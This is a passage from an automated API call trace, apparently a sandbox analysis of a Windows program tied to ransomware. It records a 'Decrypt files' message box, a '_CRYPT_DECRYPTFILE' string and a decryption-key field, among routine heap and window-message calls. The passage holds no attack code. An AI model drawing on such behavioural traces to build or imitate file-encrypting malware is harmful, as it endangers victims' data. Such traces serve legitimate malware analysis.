lpMsg=0x91fd04) returned 0 [0263.858] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.858] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.858] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.858] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.858] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0263.858] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1a50 [0263.858] Sleep (dwMilliseconds=0x0) [0263.858] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0263.858] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a50 | out: hHeap=0xc60000) returned 1 [0263.858] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.858] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0263.858] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.858] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.858] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.858] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.858] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.858] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0263.858] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1960 [0263.858] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0264.019] MessageBoxW (hWnd=0x0, lpText="Your files will be decrypted if the decryption key was correct", lpCaption="Decrypt files", uType=0x10040) returned 1 [0264.031] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.031] NtdllDialogWndProc_W () returned 0x1 [0264.032] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.032] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.032] NtdllDialogWndProc_W () returned 0x0 [0264.035] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.035] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.035] NtdllDialogWndProc_W () returned 0x0 [0264.040] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.040] NtdllDialogWndProc_W () returned 0x1 [0264.040] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.040] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.040] GetSysColor (nIndex=15) returned 0xf0f0f0 [0264.040] SetBkColor (hdc=0x38010722, color=0xf0f0f0) returned 0xf0f0f0 [0264.040] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.040] NtdllDialogWndProc_W () returned 0x0 [0264.040] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.040] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.040] GetSysColor (nIndex=15) returned 0xf0f0f0 [0264.040] SetBkColor (hdc=0x38010722, color=0xf0f0f0) returned 0xf0f0f0 [0264.040] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.040] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.040] GetWindowLongW (hWnd=0x6014c, nIndex=-21) returned 3 [0264.040] NtdllDialogWndProc_W () returned 0x0 [0264.040] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.040] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.040] GetWindowLongW (hWnd=0x6014c, nIndex=-21) returned 3 [0264.040] NtdllDialogWndProc_W () returned 0x0 [0264.056] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.056] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.056] NtdllDialogWndProc_W () returned 0x0 [0264.056] GetForegroundWindow () returned 0x9014a [0264.056] GetWindowLongW (hWnd=0x9014a, nIndex=-21) returned 9567000 [0264.067] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xca7380 [0264.067] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1960 [0264.067] Shell_NotifyIconW (dwMessage=0x1, lpData=0x91efd0) returned 1 [0264.067] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca7380 | out: hHeap=0xc60000) returned 1 [0264.067] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1960 | out: hHeap=0xc60000) returned 1 [0264.067] KillTimer (hWnd=0x50172, uIDEvent=0x1) returned 1 [0264.067] SetTimer (hWnd=0x50172, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0264.101] GetForegroundWindow () returned 0x9014a [0264.101] GetWindowLongW (hWnd=0x9014a, nIndex=-21) returned 9567000 [0264.135] GetForegroundWindow () returned 0x9014a [0264.135] GetWindowLongW (hWnd=0x9014a, nIndex=-21) returned 9567000 [0264.187] GetForegroundWindow () returned 0x9014a [0264.187] GetWindowLongW (hWnd=0x9014a, nIndex=-21) returned 9567000 [0264.196] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.196] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.196] NtdllDialogWndProc_W () returned 0x0 [0264.200] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.200] NtdllDialogWndProc_W () returned 0x1 [0264.200] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.200] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.200] GetSysColor (nIndex=15) returned 0xf0f0f0 [0264.200] SetBkColor (hdc=0x5701008e, color=0xf0f0f0) returned 0xffffff [0264.200] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.200] NtdllDialogWndProc_W () returned 0x0 [0264.200] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.200] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.200] GetSysColor (nIndex=15) returned 0xf0f0f0 [0264.200] SetBkColor (hdc=0x5701008e, color=0xf0f0f0) returned 0xf0f0f0 [0264.201] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.201] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.201] GetWindowLongW (hWnd=0x6014c, nIndex=-21) returned 3 [0264.201] NtdllDialogWndProc_W () returned 0x0 [0264.201] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.201] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.201] GetWindowLongW (hWnd=0x6014c, nIndex=-21) returned 3 [0264.201] NtdllDialogWndProc_W () returned 0x0 [0264.201] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.201] NtdllDialogWndProc_W () returned 0x1 [0264.201] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.201] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.201] GetSysColor (nIndex=15) returned 0xf0f0f0 [0264.201] SetBkColor (hdc=0x39010722, color=0xf0f0f0) returned 0xffffff [0264.202] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.202] NtdllDialogWndProc_W () returned 0x0 [0264.202] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.202] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.202] GetSysColor (nIndex=15) returned 0xf0f0f0 [0264.202] SetBkColor (hdc=0x39010722, color=0xf0f0f0) returned 0xf0f0f0 [0264.202] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.202] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.202] GetWindowLongW (hWnd=0x6014c, nIndex=-21) returned 3 [0264.202] NtdllDialogWndProc_W () returned 0x0 [0264.202] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.202] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.202] GetWindowLongW (hWnd=0x6014c, nIndex=-21) returned 3 [0264.202] NtdllDialogWndProc_W () returned 0x0 [0264.238] GetForegroundWindow () returned 0x9014a [0264.239] GetWindowLongW (hWnd=0x9014a, nIndex=-21) returned 9567000 [0264.281] GetForegroundWindow () returned 0x9014a [0264.282] GetWindowLongW (hWnd=0x9014a, nIndex=-21) returned 9567000 [0264.314] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.314] NtdllDialogWndProc_W () returned 0x1 [0264.314] NtdllDefWindowProc_W () returned 0x1 [0264.347] GetForegroundWindow () returned 0x9014a [0264.348] GetWindowLongW (hWnd=0x9014a, nIndex=-21) returned 9567000 [0264.385] GetForegroundWindow () returned 0x9014a [0264.385] GetWindowLongW (hWnd=0x9014a, nIndex=-21) returned 9567000 [0264.434] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.434] NtdllDialogWndProc_W () returned 0x0 [0264.435] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.435] NtdllDialogWndProc_W () returned 0x1 [0264.435] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.435] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.435] GetSysColor (nIndex=15) returned 0xf0f0f0 [0264.435] SetBkColor (hdc=0x4c010712, color=0xf0f0f0) returned 0xf0f0f0 [0264.437] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.437] NtdllDialogWndProc_W () returned 0x0 [0264.437] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.437] NtdllDialogWndProc_W () returned 0x0 [0264.439] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.439] NtdllDialogWndProc_W () returned 0x1 [0264.439] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.439] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.439] GetSysColor (nIndex=15) returned 0xf0f0f0 [0264.439] SetBkColor (hdc=0x4c010712, color=0xf0f0f0) returned 0xf0f0f0 [0264.439] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.439] NtdllDialogWndProc_W () returned 0x0 [0264.440] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.440] NtdllDialogWndProc_W () returned 0x0 [0264.440] NtdllDefWindowProc_W () returned 0x0 [0264.440] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.440] NtdllDialogWndProc_W () returned 0x1 [0264.441] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.441] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.441] NtdllDialogWndProc_W () returned 0x0 [0264.445] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe837c0 | out: hHeap=0xc60000) returned 1 [0264.445] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0264.445] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe815a0 | out: hHeap=0xc60000) returned 1 [0264.445] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81540 | out: hHeap=0xc60000) returned 1 [0264.445] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe836d0 | out: hHeap=0xc60000) returned 1 [0264.445] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebaeb8 | out: hHeap=0xc60000) returned 1 [0264.445] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0264.445] TranslateAcceleratorW (hWnd=0x80170, hAccTable=0x150171, lpMsg=0x91fd04) returned 0 [0264.445] TranslateMessage (lpMsg=0x91fd04) returned 0 [0264.445] DispatchMessageW (lpMsg=0x91fd04) returned 0x0 [0264.446] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0264.446] TranslateAcceleratorW (hWnd=0x80170, hAccTable=0x150171, lpMsg=0x91fd04) returned 0 [0264.446] TranslateMessage (lpMsg=0x91fd04) returned 0 [0264.446] DispatchMessageW (lpMsg=0x91fd04) returned 0x0 [0264.446] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0264.446] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.446] GetWindowLongW (hWnd=0x80170, nIndex=-20) returned 256 [0264.446] NtdllDialogWndProc_W () returned 0x1 [0264.446] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.446] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.446] GetClientRect (in: hWnd=0x80170, lpRect=0x91fa50 | out: lpRect=0x91fa50) returned 1 [0264.446] GetCursorPos (in: lpPoint=0x91fa60 | out: lpPoint=0x91fa60*(x=890, y=510)) returned 1 [0264.446] ScreenToClient (in: hWnd=0x80170, lpPoint=0x91fa60 | out: lpPoint=0x91fa60) returned 1 [0264.446] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0264.446] SetCursor (hCursor=0x10003) returned 0x10003 [0264.446] TranslateAcceleratorW (hWnd=0x80170, hAccTable=0x150171, lpMsg=0x91fd04) returned 0 [0264.446] IsDialogMessageW (hDlg=0x80170, lpMsg=0x91fd04) returned 1 [0264.446] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.446] NtdllDialogWndProc_W () returned 0x0 [0264.446] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0264.447] TranslateAcceleratorW (hWnd=0x80170, hAccTable=0x150171, lpMsg=0x91fd04) returned 0 [0264.447] IsDialogMessageW (hDlg=0x80170, lpMsg=0x91fd04) returned 1 [0264.447] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.447] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.447] BeginPaint (in: hWnd=0x80170, lpPaint=0x91f9f8 | out: lpPaint=0x91f9f8) returned 0x4c010712 [0264.447] EndPaint (hWnd=0x80170, lpPaint=0x91f9f8) returned 1 [0264.447] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0264.447] TranslateAcceleratorW (hWnd=0x80170, hAccTable=0x150171, lpMsg=0x91fd04) returned 0 [0264.447] IsDialogMessageW (hDlg=0x80170, lpMsg=0x91fd04) returned 1 [0264.448] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.448] NtdllDialogWndProc_W () returned 0x1 [0264.448] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.448] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.448] GetSysColor (nIndex=15) returned 0xf0f0f0 [0264.448] SetBkColor (hdc=0x39010722, color=0xf0f0f0) returned 0xf0f0f0 [0264.448] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.448] NtdllDialogWndProc_W () returned 0x0 [0264.448] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.448] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.448] GetSysColor (nIndex=15) returned 0xf0f0f0 [0264.448] SetBkColor (hdc=0x39010722, color=0xf0f0f0) returned 0xf0f0f0 [0264.448] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.448] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.448] GetWindowLongW (hWnd=0x6014c, nIndex=-21) returned 3 [0264.449] NtdllDialogWndProc_W () returned 0x0 [0264.449] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.449] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.449] GetWindowLongW (hWnd=0x6014c, nIndex=-21) returned 3 [0264.449] NtdllDialogWndProc_W () returned 0x0 [0264.463] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0264.464] TranslateAcceleratorW (hWnd=0x80170, hAccTable=0x150171, lpMsg=0x91fd04) returned 0 [0264.464] TranslateMessage (lpMsg=0x91fd04) returned 0 [0264.464] DispatchMessageW (lpMsg=0x91fd04) returned 0x0 [0264.464] GetForegroundWindow () returned 0x80170 [0264.464] GetWindowLongW (hWnd=0x80170, nIndex=-21) returned 0 [0264.464] GetCursorPos (in: lpPoint=0x91fb40 | out: lpPoint=0x91fb40*(x=890, y=510)) returned 1 [0264.464] ScreenToClient (in: hWnd=0x80170, lpPoint=0x91fb40 | out: lpPoint=0x91fb40) returned 1 [0264.464] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x24) returned 0xe905e8 [0264.465] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe836d0 [0264.465] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1960 [0264.465] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1a50 [0264.465] GetAsyncKeyState (vKey=1) returned 1 [0264.465] GetAsyncKeyState (vKey=2) returned 0 [0264.465] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 1 [0264.465] TranslateAcceleratorW (hWnd=0x80170, hAccTable=0x150171, lpMsg=0x91fd04) returned 0 [0264.465] IsDialogMessageW (hDlg=0x80170, lpMsg=0x91fd04) returned 1 [0264.465] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0264.465] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1990 [0264.465] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xee0c80 [0264.465] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTFILE") returned 0x12 [0264.465] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee0c80 | out: hHeap=0xc60000) returned 1 [0264.466] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1990 | out: hHeap=0xc60000) returned 1 [0264.466] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebaeb8 [0264.466] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1) returned 0xef1990 [0264.466] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb048 [0264.466] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81540 [0264.466] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1970 [0264.466] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe815a0 [0264.466] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1a80 [0264.466] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xeca7f8 [0264.466] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0264.466] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1940 [0264.466] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xee0c80 [0264.466] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0264.466] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0264.466] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x80) returned 0xcc71a8 [0264.466] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee0c80 | out: hHeap=0xc60000) returned 1 [0264.466] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0264.466] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0264.466] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe811b0 | out: hHeap=0xc60000) returned 1 [0264.466] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca7f8 | out: hHeap=0xc60000) returned 1 [0264.467] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a80 | out: hHeap=0xc60000) returned 1 [0264.467] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1970 | out: hHeap=0xc60000) returned 1 [0264.467] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1) returned 0xef1970 [0264.467] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe811b0 [0264.467] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1a80 [0264.467] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe837c0 [0264.467] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1930 [0264.467] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xeca7f8 [0264.467] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83b38 [0264.467] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1920 [0264.467] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xee0c80 [0264.467] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83b38 | out: hHeap=0xc60000) returned 1 [0264.467] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83b38 [0264.467] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x80) returned 0xcc7230 [0264.467] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee0c80 | out: hHeap=0xc60000) returned 1 [0264.467] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83b38 | out: hHeap=0xc60000) returned 1 [0264.467] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca7f8 | out: hHeap=0xc60000) returned 1 [0264.467] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1930 | out: hHeap=0xc60000) returned 1 [0264.467] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1a80 | out: hHeap=0xc60000) returned 1 [0264.467] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1) returned 0xef1a80 [0264.467] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83b38 [0264.467] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1930 [0264.468] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebad78 [0264.468] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe813f0 [0264.468] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1910 [0264.468] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1910 | out: hHeap=0xc60000) returned 1 [0264.468] SendMessageW (hWnd=0x600a2, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xd [0264.468] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1c) returned 0xebb1d8 [0264.468] GetWindowTextW (in: hWnd=0x600a2, lpString=0xebb1d8, nMaxCount=14 | out: lpString="Decryptionkey") returned 13 [0264.468] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81480 [0264.468] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb228 [0264.468] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1910 [0264.468] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb1d8 | out: hHeap=0xc60000) returned 1 [0264.468] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe813f0 | out: hHeap=0xc60000) returned 1 [0264.468] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebad78 | out: hHeap=0xc60000) returned 1 [0264.468] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1930 | out: hHeap=0xc60000) returned 1 [0264.468] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x1) returned 0xef1930 [0264.468] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe813f0 [0264.468] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1900 [0264.468] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1900 | out: hHeap=0xc60000) returned 1 [0264.468] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe838f8 [0264.468] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebad78 [0264.468] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83a00 [0264.469] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1900 [0264.469] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83a00 | out: hHeap=0xc60000) returned 1 [0264.469] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb1d8 [0264.469] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83a00 [0264.469] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83ad8 [0264.469] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb250 [0264.469] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81360 [0264.469] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef18f0 [0264.469] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81360 | out: hHeap=0xc60000) returned 1 [0264.469] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xee0c80 [0264.469] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81360 [0264.469] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81390 [0264.469] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb278 [0264.469] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83aa8 [0264.469] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef18e0 [0264.469] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83aa8 | out: hHeap=0xc60000) returned 1 [0264.469] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb2a0 [0264.469] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83aa8 [0264.469] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe837d8 [0264.469] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb2c8 [0264.470] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe812a0 [0264.470] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef18d0 [0264.470] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83a30 [0264.470] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c7f0 [0264.470] 